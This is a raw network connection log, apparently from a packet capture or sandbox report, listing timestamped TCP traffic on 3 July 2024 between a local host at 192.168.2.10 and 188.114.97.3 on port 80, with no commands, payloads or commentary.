                                                    Jul 3, 2024 16:42:43.797420979 CEST4976180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:43.803791046 CEST8049761188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:44.150860071 CEST4976180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:44.156023979 CEST8049761188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:44.283164024 CEST8049761188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:44.338206053 CEST4976180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:44.621587992 CEST8049761188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:44.666347027 CEST4976180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:44.744112015 CEST4976180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:44.749511957 CEST8049761188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:44.752410889 CEST4976180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:44.761686087 CEST4976280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:44.768209934 CEST8049762188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:44.768500090 CEST4976280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:44.768712997 CEST4976280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:44.773513079 CEST8049762188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:45.128559113 CEST4976280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:45.133600950 CEST8049762188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:45.243262053 CEST8049762188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:45.291419029 CEST4976280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:45.583950043 CEST8049762188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:45.635124922 CEST4976280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:45.707840919 CEST4976080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:45.715065956 CEST4976280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:45.716031075 CEST4976380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:45.720558882 CEST8049762188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:45.720635891 CEST4976280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:45.721038103 CEST8049763188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:45.721113920 CEST4976380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:45.721298933 CEST4976380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:45.726160049 CEST8049763188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:46.075859070 CEST4976380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:46.080938101 CEST8049763188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:46.169296980 CEST8049763188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:46.213172913 CEST4976380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:46.525403023 CEST8049763188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:46.572556973 CEST4976380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:46.945502043 CEST4976480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:46.951090097 CEST8049764188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:46.951160908 CEST4976480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:46.951354980 CEST4976480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:46.956784964 CEST8049764188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:47.307084084 CEST4976480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.312196970 CEST8049764188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:47.428067923 CEST8049764188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:47.478807926 CEST4976480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.730129004 CEST4976480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.730642080 CEST4976580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.735521078 CEST8049764188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:47.735585928 CEST4976480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.735685110 CEST8049765188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:47.735750914 CEST4976580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.735857010 CEST4976580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.741185904 CEST8049765188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:47.868088961 CEST4976680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.873051882 CEST8049766188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:47.873277903 CEST4976680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.873372078 CEST4976680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.878308058 CEST8049766188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.088502884 CEST4976580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.096931934 CEST8049765188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.097266912 CEST8049765188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.206337929 CEST8049765188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.228888988 CEST4976680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.234019041 CEST8049766188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.260060072 CEST4976580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.323013067 CEST8049766188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.369496107 CEST4976680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.414809942 CEST8049765188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.463174105 CEST4976580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.675503016 CEST8049766188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.728806019 CEST4976680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.801517010 CEST4974380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.801583052 CEST4976380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.804182053 CEST4976580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.804182053 CEST4976680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.804996967 CEST4976780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.809510946 CEST8049765188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.809568882 CEST4976580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.810525894 CEST8049766188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.810687065 CEST4976680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.810725927 CEST8049767188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.810801983 CEST4976780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.810914040 CEST4976780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.815953016 CEST8049767188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:49.170265913 CEST4976780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:49.175447941 CEST8049767188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:49.256891966 CEST8049767188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:49.306917906 CEST4976780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:49.598372936 CEST8049767188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:49.650712013 CEST4976780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:49.727612972 CEST4976880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:49.732673883 CEST8049768188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:49.736413956 CEST4976880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:49.736592054 CEST4976880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:49.742014885 CEST8049768188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:50.088299036 CEST4976880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:50.093501091 CEST8049768188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:50.180145979 CEST8049768188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:50.228832006 CEST4976880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:50.525412083 CEST8049768188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:50.572577000 CEST4976880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:50.648509979 CEST4976880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:50.649333954 CEST4976980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:50.653688908 CEST8049768188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:50.653738976 CEST4976880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:50.654356956 CEST8049769188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:50.654428005 CEST4976980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:50.654637098 CEST4976980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:50.659625053 CEST8049769188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:51.010195971 CEST4976980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:51.016180038 CEST8049769188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:51.117734909 CEST8049769188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:51.166403055 CEST4976980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:51.483047009 CEST8049769188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:51.525687933 CEST4976980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:51.645303011 CEST4976980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:51.645654917 CEST4977080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:51.650604963 CEST8049769188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:51.650741100 CEST4976980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:51.650907040 CEST8049770188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:51.650969982 CEST4977080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:51.651438951 CEST4977080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:51.656421900 CEST8049770188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:52.010250092 CEST4977080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:52.015227079 CEST8049770188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:52.132659912 CEST8049770188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:52.181982994 CEST4977080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:52.494422913 CEST8049770188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:52.541336060 CEST4977080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:52.618390083 CEST4977080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:52.619082928 CEST4977180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:52.623645067 CEST8049770188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:52.624327898 CEST8049771188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:52.624408960 CEST4977080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:52.624450922 CEST4977180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:52.624691010 CEST4977180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:52.629575014 CEST8049771188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:52.979403019 CEST4977180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:52.984548092 CEST8049771188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.098740101 CEST8049771188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.150696993 CEST4977180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.423744917 CEST4977280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.424068928 CEST4977180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.428889990 CEST8049772188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.429007053 CEST4977280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.429064989 CEST4977280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.429347992 CEST8049771188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.429399967 CEST4977180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.433971882 CEST8049772188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.593815088 CEST4977380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.598718882 CEST8049773188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.598794937 CEST4977380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.598925114 CEST4977380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.603749990 CEST8049773188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.775899887 CEST4977280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.780874014 CEST8049772188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.781302929 CEST8049772188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.884541988 CEST8049772188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.931967974 CEST4977280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.947949886 CEST4977380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.952842951 CEST8049773188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:54.104304075 CEST8049772188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:54.110841036 CEST8049773188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:54.150707960 CEST4977280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:54.166313887 CEST4977380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:54.449040890 CEST8049773188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:54.494580984 CEST4977380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:54.572216988 CEST4977280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:54.572463989 CEST4977380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:54.573210955 CEST4977480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:54.577867031 CEST8049772188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:54.577950001 CEST4977280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:54.578028917 CEST8049774188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:08.641988039 CEST8049795188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:08.778057098 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:08.822690010 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:08.995044947 CEST4979580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:09.000119925 CEST8049795188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:09.100713015 CEST8049795188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:09.150752068 CEST4979580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:09.441617012 CEST8049795188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:09.494493961 CEST4979580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:09.577244997 CEST4979480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:09.580037117 CEST4979580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:09.580394983 CEST4979680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:09.585371017 CEST8049795188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:09.585429907 CEST4979580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:09.586699009 CEST8049796188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:09.588433981 CEST4979680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:09.592525005 CEST4979680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:09.597635031 CEST8049796188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:09.792803049 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:09.798362017 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:09.887660027 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:09.887831926 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:09.892777920 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:09.892885923 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:09.947793007 CEST4979680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:09.952811956 CEST8049796188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:10.062401056 CEST8049796188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:10.103868961 CEST4979680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:10.223191977 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:10.275716066 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:10.413378954 CEST8049796188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:10.463231087 CEST4979680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:10.508276939 CEST8049796188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:10.557068110 CEST4979680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:10.656594038 CEST4979680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:10.660572052 CEST4979780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:10.660845041 CEST4979880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:10.665689945 CEST8049796188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:10.665776968 CEST4979680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:10.668924093 CEST8049797188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:10.668946028 CEST8049798188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:10.669020891 CEST4979780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:10.669055939 CEST4979880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:10.767369032 CEST4979780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:10.767451048 CEST4979880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:10.776705980 CEST8049797188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:10.781131029 CEST8049798188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:11.119899035 CEST4979880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:11.119899988 CEST4979780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:11.127140999 CEST8049798188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:11.127254009 CEST8049797188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:11.128679991 CEST8049798188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:11.128693104 CEST8049798188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:11.128701925 CEST8049797188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:11.182045937 CEST4979780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:11.182045937 CEST4979880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:11.229513884 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:11.238163948 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:11.327704906 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:11.328689098 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:11.338625908 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:11.338640928 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:11.554713964 CEST8049797188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:11.560034037 CEST8049798188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:11.603861094 CEST4979780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:11.603914976 CEST4979880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:11.621368885 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:11.666352987 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:11.681195021 CEST4979780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:11.681449890 CEST4979880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:11.681879997 CEST4979980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:11.687551022 CEST8049797188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:11.687567949 CEST8049799188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:11.687625885 CEST4979780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:11.687665939 CEST4979980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:11.687819958 CEST4979980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:11.688494921 CEST8049798188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:11.688549042 CEST4979880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:11.693581104 CEST8049799188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:12.041554928 CEST4979980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:12.048976898 CEST8049799188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:12.148017883 CEST8049799188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:12.197608948 CEST4979980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:12.559828043 CEST8049799188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:12.603902102 CEST4979980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:12.636010885 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:12.642256021 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:12.684350014 CEST4979980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:12.688014030 CEST4980080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:12.692436934 CEST8049799188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:12.692519903 CEST4979980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:12.696439981 CEST8049800188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:12.696537971 CEST4980080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:12.696732044 CEST4980080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:12.708455086 CEST8049800188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:12.731632948 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:12.731857061 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:12.737535000 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:12.739048958 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:13.042480946 CEST4980080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:13.047811031 CEST8049800188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:13.067936897 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:13.116364956 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:13.147202015 CEST8049800188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:13.197633982 CEST4980080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:13.493649006 CEST8049800188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:13.541342020 CEST4980080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:13.621670961 CEST4980080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:13.622181892 CEST4980180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:13.627254963 CEST8049800188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:13.627285004 CEST8049801188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:13.627387047 CEST4980080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:13.627429962 CEST4980180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:13.635381937 CEST4980180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:13.640749931 CEST8049801188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:13.994719982 CEST4980180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:13.999988079 CEST8049801188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.073318005 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.078469038 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.097179890 CEST8049801188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.150738001 CEST4980180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.168092966 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.168271065 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.173341990 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.173408031 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.301501036 CEST8049801188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.353986979 CEST4980180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.437292099 CEST4980180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.438276052 CEST4980280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.442511082 CEST8049801188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.442565918 CEST4980180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.443293095 CEST8049802188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.443367958 CEST4980280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.443526983 CEST4980280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.448544025 CEST8049802188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.501064062 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.541354895 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.791599989 CEST4980280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:14.796561956 CEST8049802188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.908571959 CEST8049802188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:14.963301897 CEST4980280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.255477905 CEST8049802188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.307003975 CEST4980280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.413913012 CEST4980280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.414371967 CEST4980380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.419334888 CEST8049802188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.419437885 CEST4980280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.419625998 CEST8049803188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.420290947 CEST4980380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.420603037 CEST4980380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.425424099 CEST8049803188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.512069941 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.517421961 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.611356974 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.611572027 CEST4978580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.616460085 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.617202997 CEST8049785188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:15.775877953 CEST4980380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:15.781172037 CEST8049803188.114.97.3192.168.2.10
